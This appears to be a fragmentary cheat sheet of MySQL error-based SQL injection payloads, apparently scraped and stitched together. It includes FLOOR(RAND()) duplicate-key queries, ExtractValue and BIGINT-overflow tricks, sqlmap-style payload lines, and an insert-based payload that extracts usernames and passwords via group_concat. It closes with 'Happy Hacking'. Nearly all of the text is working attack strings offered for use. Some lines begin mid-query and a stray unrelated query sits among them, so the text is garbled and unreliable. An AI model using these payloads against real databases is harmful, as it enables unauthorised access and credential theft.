Numeric: Query like SELECT * FROM Table WHERE id = FUZZ
Select sum(record_count) as total_database_record_ct from tcounts
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)
x from information_schema.tables group by x)a) and '1'='1. Retrieving the names of all tables: Note: m-n denotes the result of counting the values at m=0, m+1…n-1; replace hex_code_of_database_name with the required value; replace m-n with the required value.
clause Payload: id=3 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)
Payload: ID=1' AND (SELECT 3371 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(3371=3371,1))),0x7176767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VppA'='VppA.
eWgj') AND (SELECT 8208 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(8208=8208,1))),0x7176707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('Zaph'='Zaph.
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5.
e.g. select !(select * from (select version())x) - ~0; (~ is bitwise negation; ! typecasts from string to number.)
$post_data = any data',(select group_concat(username,0x3a,password) from any_table_name_here))--. You can also use LIMIT if required; if you don't know how to use LIMIT, go and read Death Row Injection. Happy Hacking.